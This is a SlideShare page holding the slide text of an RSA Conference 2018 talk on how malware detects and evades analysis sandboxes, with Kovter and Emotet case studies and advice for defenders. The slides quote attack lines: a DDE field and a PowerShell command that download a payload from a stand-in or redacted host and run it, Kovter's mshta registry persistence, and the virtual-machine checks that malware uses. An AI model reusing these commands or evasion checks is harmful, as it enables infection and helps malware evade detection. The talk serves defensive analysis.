SlideShare une entreprise Scribd logo

Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

Priyanka Aash
Priyanka Aash

With many organizations using a sandbox to detonate suspicious files, many threats are implementing logic to detect sandbox environments, to alter their behavior and evade detection. This talk will highlight many real-world evasion tactics employed by recent malware, discussing challenges in measuring evasive behaviors and offering insights to improving the effectiveness of the sandbox. (Source: RSA Conference USA 2018)

Technologie
1  sur  46
Télécharger pour lire hors ligne
SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos
# R S A C Cloud Sandbox 2 Internet Known Good Execute Known Bad? Sandbox
# R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior What is a Cloud Sandbox useful for? 3
# R S A C Example: 0-day DDE exploit 4 Intended use – spreadsheet data link { DDEAUTO excel "C:My DocumentsProfits.xls“ "Sheet1!R1C1:R4C4" p } Exploited use – malware download { DDEAUTO cmd.exe “/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader ((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw2 3FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell - e $a1” }
# R S A C • Malware comes in all shapes and sizes… o Windows executables o Office & PDF documents o Scripts, Java, Windows Shortcuts o Zip, Tar, Rar, & archives • Detect 0-day threats based on behavior • But what if the threat behaves differently in the Sandbox? What is a Cloud Sandbox useful for? 5
# R S A C Evasive threats 6 IF is_sandbox() THEN something_good() ELSE something_bad()
# R S A C is_sandbox() •Artifacts: Files, Registry Keys, Drivers, Disk/CPU names •Behavior: CPU behavior Anti-VM •Artifacts: tools or scripts, realistic hardware •Behavior: human-like activity Anti-sandbox •Explicit delay: Sleep(…) •Implicit delay: user interaction required Timing
# R S A C something_good() ExitProcess() Loop forever Self delete
#RSAC IN THE WILD
# R S A C Kovter Malware HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCUsoftware4a9e7b11c06bee3829"); eval(ztJ4n7);
# R S A C Kovter – VM Evasion Tests 11 Running processes VBoxService.exe VMwareUser.exe Registry keys HARDWAREACPIDSDTVBOX__ HKLMSOFTWAREVMWare, Inc. Other artifacts .vmmemctl PIPE VMwareCopyPasteSetClipboard event
# R S A C CPUID - Artifacts CPUID Vendor -> “GenuineIntel” CPUID Hypervisor -> 0x0 CPUID Vendor -> “KVMKVMKVM” CPUID Hypervisor -> 0x80000000
# R S A C CPUID - Timing CPUID… CPUID… …“GenuineIntel” t1 t2 t1t2 CPUID cost
# R S A C Evasive Activity Legitimacy
#RSAC ACTIVE EVASIONS
# R S A C Document Malware
# R S A C Macro Evasion: Realistic Filename “Is my file name… “ “… only hexadecimal characters?“
# R S A C Macro Evasion: Realistic History “Is there fewer than 3 recently used files?“
# R S A C Macro Evasion: Blacklist Processes “Are there any VM or analysis tools running?“
# R S A C Macro Evasion: GEO IP “Does the GEO IP match my target?“
# R S A C Leverage #1 - Protection is_sandbox() something_bad()
# R S A C Leverage #2 – Bypass Does C:B78AE926 exist? No: Run evasions Yes: Run malware
# R S A C Leverage #3 - Vaccination is_sandbox() == TRUE
#RSAC PASSIVE EVASIONS
# R S A C Documents: Some Clicks Required
# R S A C Time: 0 min Time: 2 min Time: 5 min Explicit Delay powershell “ sleep 300; new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',‘%TEMP%Local.exe') & start-process ‘%TEMP%Local.exe'" Sandbox Analysis
# R S A C Implicit Delay: Busy work FOR i=0; i < 500,000; i++ DO IsDebuggerPresent() END FOR Bare Metal Virtual Machine Sandbox
# R S A C Typical Human Input GetLastInputInfo() GetCursorPos()
# R S A C File Structure > unzip -l IMAGES.ZIP Length Date Time Name --------- ---------- ----- ---- 518144 2018-01-17 02:17 IMG_1715.jpg <--- Windows EXE!!! 364671 2018-01-13 12:39 IMG_1716.jpg <--- JPEG image 430040 2018-01-13 12:39 IMG_1717.jpg <--- JPEG image 452211 2018-01-13 12:39 IMG_1718.jpg <--- JPEG image 391279 2018-01-13 12:38 IMG_1719.jpg <--- JPEG image --------- ------- 2156345 5 files
#RSAC EVASIVE TIMELINE: EMOTET
# R S A C Emotet Delivery: Some Clicks Required
# R S A C Emotet: Custom Loader Jul 2017 – Decrypts in-place Aug 2017 – Loader added Packed EXE decrypt Emotet EXE Packed EXE decrypt Emotet EXE Loader EXE
# R S A C Emotet EXE Emotet – Oct 2017, is_sandbox() v1 Loader EXE evasions is_sandboxsample.exe artifact.exe John Doe TEQUILABOOMBOOM Wilbert / SC admin / SystemIT C:123email.doc C:email.htm C:email.doc
# R S A C Emotet: Loader In-Memory Obfuscation Emotet EXE Loader EXE busy work Stolen Code 1. New memory region for stolen instructions 2. Steal instructions from EXE, patch in detour to “busy work” routine evasions
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “TEQUILABOOMBOOM” Queries for sensitive data remain
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Hide sensitive strings, like “sample.exe” Huge increase in file system inspection activity
# R S A C Emotet: Dec 2017, is_sandbox() v2 Loader Evasions V1 String comparisons – tested via lstrcmpA API File existence – tested via CreateFileA API Sandbox detected => ExitProcess() Loader Evasions V2 String comparisons – inline strcmp function, no API File existence – full file system enumeration via FindFirstFile API Sandbox detected => repeat evasion tests, infinitely Avoid bailout “tell” Repeated increase in file system inspection activity
# R S A C Emotet: Jan 2018, Evasion Fragments 39 is_sandbox() disabled, but … Dec 2017 TEQUILABOOMBOOM SystemIT John Doe Jan 2018 "T E Q U I L A B O O M B O O M” “S y s t e m I T” Aller Doe
# R S A C Emotet: Feb 2018, Evasion Retraction Emotet EXE Loader EXE Stolen Code busy work evasions
# R S A C Emotet Evasive Tactic Timeline Jul 2017 •Busy work Aug 2017 •Loader module Oct 2017 •is_sandbox v1 Dec 2017 •is_sandbox v2 •something_good v2 Jan 2018 •is_sandbox “off” •Fragments remain Feb 2018 •is_sandbox removed
#RSAC TAKEAWAYS
# R S A C Summary Leverage • is_sandbox() == something_bad() Battle ground • Infinitely many tactics, equally many defenses Raise the bar • Attacks require greater depth & complexity
# R S A C Predictions Virtual machine tactics - expect decline •Existing mitigations, assets in the cloud Human-like behavior – expect growth •Real user activity, victim profiling Avoid detonation – expect growth •Dodge execution in the Sandbox altogether
# R S A C Actions: Engage, Familiarize, Experiment • Security partner’s approach to evasive threatsEngage • Open-source tools to test anti-sandbox tacticsFamiliarize • Deploy your own open-source sandboxExperiment PAFish Tool https://github.com/a0rtega/pafish Al-KhaserTool https://github.com/LordNoteworthy/al-khaser Cuckoo Sandbox https://cuckoosandbox.org/
#RSAC THANK YOU

Recommandé

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Software Guru
 
4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 

Recommandé

Windows persistence presentation
Windows persistence presentationWindows persistence presentation
Windows persistence presentationOlehLevytskyi1
 
(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threat(130119) #fitalk apt, cyber espionage threat
(130119) #fitalk apt, cyber espionage threatINSIGHT FORENSIC
 
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...
Cómo construir pipelines para streaming de datos en visualizaciones: Un ejemp...Software Guru
 
4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadh4055-841_Project_ShailendraSadh
4055-841_Project_ShailendraSadhShailendra Sadh - CISSP
 
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis EN
[2014 CodeEngn Conference 11] 김호빈 - Android Bootkit Analysis ENGangSeok Lee
 
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) Shen
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
 
Bsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsBsides chicago 2013 honeypots
Bsides chicago 2013 honeypotsTazdrumm3r
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyCrowdStrike
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...Felipe Prado
 
tit
tittit
titChristian Heinrich
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Levente Kurusa
 
Native hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerNative hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerKevin Mai-Hsuan Chia
 
Malware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersMalware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersTazdrumm3r
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume CompromiseZach Grace
 
About linux-english
About linux-englishAbout linux-english
About linux-englishShota Ito
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...OpenDNS
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 reportKoji Kawamura
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 

Contenu connexe

Tendances

Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsTazdrumm3r
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)Javier Junquera
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentNahidul Kibria
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyCrowdStrike
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...Felipe Prado
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scaleChandrapal Badshah
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin
 
Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Levente Kurusa
 
Native hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerNative hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerKevin Mai-Hsuan Chia
 
Malware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersMalware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersTazdrumm3r
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume CompromiseZach Grace
 
About linux-english
About linux-englishAbout linux-english
About linux-englishShota Ito
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...OpenDNS
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł MaziarzPROIDEA
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 reportKoji Kawamura
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
 

Tendances (20)

Bsides detroit 2013 honeypots
Bsides detroit 2013 honeypotsBsides detroit 2013 honeypots
Bsides detroit 2013 honeypots
 
"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski"A rootkits writer’s guide to defense" - Michal Purzynski
"A rootkits writer’s guide to defense" - Michal Purzynski
 
The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)The day I ruled the world (RootedCON 2020)
The day I ruled the world (RootedCON 2020)
 
Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]Laura Garcia - Shodan API and Coding Skills [rooted2019]
Laura Garcia - Shodan API and Coding Skills [rooted2019]
 
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environmentThreat hunting != Throwing arrow! Hunting for adversaries in your it environment
Threat hunting != Throwing arrow! Hunting for adversaries in your it environment
 
End-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware FamilyEnd-to-End Analysis of a Domain Generating Algorithm Malware Family
End-to-End Analysis of a Domain Generating Algorithm Malware Family
 
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
DEF CON 27 - MAKSIM SHUDRAK - zero bugs found hold my beer afl how to improve...
 
tit
tittit
tit
 
Dangling DNS records takeover at scale
Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!Linux Kernel - Let's Contribute!
Linux Kernel - Let's Contribute!
 
Native hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linkerNative hook mechanism in Android Bionic linker
Native hook mechanism in Android Bionic linker
 
Malware analysis - What to learn from your invaders
Malware analysis - What to learn from your invadersMalware analysis - What to learn from your invaders
Malware analysis - What to learn from your invaders
 
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...
 
Assume Compromise
Assume CompromiseAssume Compromise
Assume Compromise
 
About linux-english
About linux-englishAbout linux-english
About linux-english
 
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
Using Algorithms to Brute Force Algorithms...A Journey Through Time and Names...
 
"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz"Powershell kung-fu" - Paweł Maziarz
"Powershell kung-fu" - Paweł Maziarz
 
ApacheCon NA 2011 report
ApacheCon NA 2011 reportApacheCon NA 2011 report
ApacheCon NA 2011 report
 
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection AttacksNozzle: A Defense Against Heap-spraying Code Injection Attacks
Nozzle: A Defense Against Heap-spraying Code Injection Attacks
 

Similaire à Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1

MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationOlehLevytskyi1
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackPriyanka Aash
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeKaspersky
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...CODE BLUE
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017J Hartig
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsChris Gates
 
27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcapFreddy Buenaño
 
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...DevOpsDays Tel Aviv
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheetMartin Cabrera
 
Антон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствамиАнтон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствамиSergey Platonov
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]RootedCON
 
From Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook DriversFrom Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook DriversOllie Whitehouse
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwarePriyanka Aash
 
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacIsolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacPriyanka Aash
 
STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!STIX Patterning: Viva la revolución!
STIX Patterning: Viva la revolución!treyka
 
DevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat ModellingDevSecCon Talk: An experiment in agile Threat Modelling
DevSecCon Talk: An experiment in agile Threat ModellingzeroXten
 

Similaire à Playing games-in-the-sandbox-dynamic-analysis-and-modern-evasion-tactics copy1 (20)

MacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentationMacOS forensics and anti-forensics (DC Lviv 2019) presentation
MacOS forensics and anti-forensics (DC Lviv 2019) presentation
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Hacking Exposed: The Mac Attack
Hacking Exposed: The Mac AttackHacking Exposed: The Mac Attack
Hacking Exposed: The Mac Attack
 
Catching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS OfficeCatching Multilayered Zero-Day Attacks on MS Office
Catching Multilayered Zero-Day Attacks on MS Office
 
Basic malware analysis
Basic malware analysis Basic malware analysis
Basic malware analysis
 
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh...
 
Nullbyte 6ed. 2019
Nullbyte 6ed. 2019Nullbyte 6ed. 2019
Nullbyte 6ed. 2019
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Basic malware analysis
Basic malware analysisBasic malware analysis
Basic malware analysis
 
27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap27.2.10 lab extract an executable from a pcap
27.2.10 lab extract an executable from a pcap
 
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
How We Analyzed 1000 Dumps in One Day - Dina Goldshtein, Brightsource - DevOp...
 
Memory forensics cheat sheet
Memory forensics cheat sheetMemory forensics cheat sheet
Memory forensics cheat sheet
 
Антон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствамиАнтон Наумович, Система автоматической крэш-аналитики своими средствами
Антон Наумович, Система автоматической крэш-аналитики своими средствами
 
Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]Joxean Koret - Database Security Paradise [Rooted CON 2011]
Joxean Koret - Database Security Paradise [Rooted CON 2011]
 
From Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook DriversFrom Problem to Solution: Enumerating Windows Firewall-Hook Drivers
From Problem to Solution: Enumerating Windows Firewall-Hook Drivers
 
OSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adwareOSX Pirrit : Why you should care about malicious mac adware
OSX Pirrit : Why you should care about malicious mac adware
 
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation ThreatsrsacIsolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
Isolating the Ghost in the Machine: Unveiling Post Exploitation Threatsrsac
 
STIX Patterning: Viva la revolución!
